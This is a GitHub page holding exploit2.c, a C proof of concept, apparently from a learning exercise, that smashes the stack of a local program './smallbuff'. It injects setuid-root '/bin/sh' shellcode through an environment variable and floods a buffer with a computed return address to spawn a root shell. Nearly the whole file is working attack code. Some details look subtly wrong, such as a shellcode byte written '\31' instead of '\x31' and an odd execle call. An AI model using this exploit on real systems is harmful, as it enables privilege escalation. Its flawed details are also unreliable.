-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathexploit2.c
35 lines (28 loc) · 1011 Bytes
/
exploit2.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <stdio.h>
#define VULN "./smallbuff"
#define SIZE 160
char shellcode[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
int main(){
char p[SIZE]; // 小缓冲区,只保存返回地址
char *env[] = {shellcode,NULL}; // 环境变量,以空指针结束
char *vuln[] = {VULN,p,NULL}; //
int *ptr,i,addr;
addr = 0xffffdff8 - strlen(shellcode)-strlen(VULN);
fprintf(stderr,"[***] using address: %#010x\n",addr);
ptr = (int*)(p+2);
for(int i=0;i<SIZE;i+=4){
*ptr++=addr;
}
execle(vuln[0],(char*)vuln,p,NULL,env);
//int execle(constchar *path, const char *arg,..., char * const envp[]);
//第一个参数:全路径
//env[],表示传递的是环境变量的数组
return 0;
}